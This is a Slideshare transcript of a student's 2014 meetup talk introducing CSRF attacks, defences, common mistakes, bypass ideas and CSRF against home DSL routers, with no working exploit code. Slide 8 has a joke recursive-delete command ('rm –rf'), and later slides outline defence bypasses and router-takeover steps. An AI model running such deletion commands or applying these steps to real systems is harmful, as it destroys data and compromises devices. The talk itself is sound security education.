Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Introduction to CSRF Attacks & Defense

2,619 views

Published on

It's the PPT of the presentation at Null Hyd June 2014 meet.
I tried to make it as simple as i can :)
Share if you like and please let me know your suggestions :)

Published in: Technology, News & Politics

Introduction to CSRF Attacks & Defense

  1. 1. Introduction to CSRF Attacks &defenses.
  2. 2. Who Am I ? I’m P.B.Surya.Subhash, a 17 Year old Coder, Hacker and a student. Certified by Microsoft and was offered a job by Yahoo, Dell , Slideshare and a couple of other MNC’s Helped USA.Gov, Nic.in, NCSL, Netherlands. pbssubhash@gmail.com@pbssubhashFb.me/pbssubhashLinkedin.com/in/pbssubhash
  3. 3. And many more…
  4. 4. • What’s CSRF ? • Impact of CSRF • How to test websites for CSRF ? • Real time attack scenario of CSRF. • Defenses against CSRF • How to Bypass those defenses ? • Using CSRF to compromise DSL Routers • Conclusion  Agenda
  5. 5. What’s this CSRF ? •CrosssiterequestforgeryabbreviatedasCSRFandalsoknownasSession Riding. •Forcesanendusertoexecuteunwantedactionsonawebapplicationin whichhe/sheiscurrentlyauthenticated.
  6. 6. Impact  A successful CSRF exploit can compromise end user data and operation in case of normal user.  If the targeted end user is the administrator account, this can compromise the entire web application.
  7. 7. That’s all ? • Anythinganauthenticatedusercando • Norestrictionfromsameoriginpolicy,except… • Attackerscannotreadresponsesfromotherorigins • Limitedonwhatcanbedonewithdata • Severeimpactonaccountability-Logentriesreflecttheactionsavictimwastrickedinto executing
  8. 8. How to find these ?So lets break it ! (root@null: rm –rf /root/earth/security/)
  9. 9. Let’s Exploit it !
  10. 10. Killer Combination ! • Persistent Script Injection + CSRF = PWN3D
  11. 11. defenses  The simplest one is to validate the Referrer header in the HTTP Request preventing the request from unknown sources.  The most popular one remains the token.  Custom HTTP Header like X-Requested-By: My Site.com – Not so popular…  Same Orgin Policy.  Re-authentication  Captcha
  12. 12. Common Mistakes :- • Not validating the token .. • Not applying captcha properly. Example :- http://www.youtube.com/watch?v=zl0ARKQhoLA
  13. 13. Misconceptions – Defenses That Don’t Work  Only accept POST  Stops simple link-based attacks (IMG, frames, etc.)  But hidden POST requests can be created with frames, scripts, etc…  Referrer checking  Some users prohibit referrers, so you can’t just require referrer headers  Techniques to selectively create HTTP request without referrers exist  Requiring multi-step transactions  CSRF attack can perform each step in order None of these approaches will sufficiently protect against CSRF!
  14. 14. Intro on How to Bypass those defenses ? • Clickjacking • Bypassing SOP • Insecure CrossDomain.XML • Openly available exploits • Bypassing the captcha • Checking Token Validation • Checking header Validation • Converting POST based requests to GET based requests.
  15. 15. CSRF to compromise DSL Routers ? • Home DSL routers aren't secure from specialized CSRF attacks. Once the DSL router is owned, attackers can have their way with the internal network. Initiate a connection to the new DSL router. Turn on remote management. Add a password to the Admin user account.
  16. 16. Demo Time
  17. 17. References :- • https://en.wikipedia.org/wiki/Cross-site_request_forgery • https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) • https://docs.djangoproject.com/en/dev/ref/contrib/csrf/ • https://projects.webappsec.org/Cross-Site-Request-Forgery • https://www.owasp.org/index.php/Cross- Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
  18. 18. Anything to ask ?
  19. 19. Bye ! Please drop your suggestions at @pbssubhash (or) pbssubhash@gmail.com Thank You!

×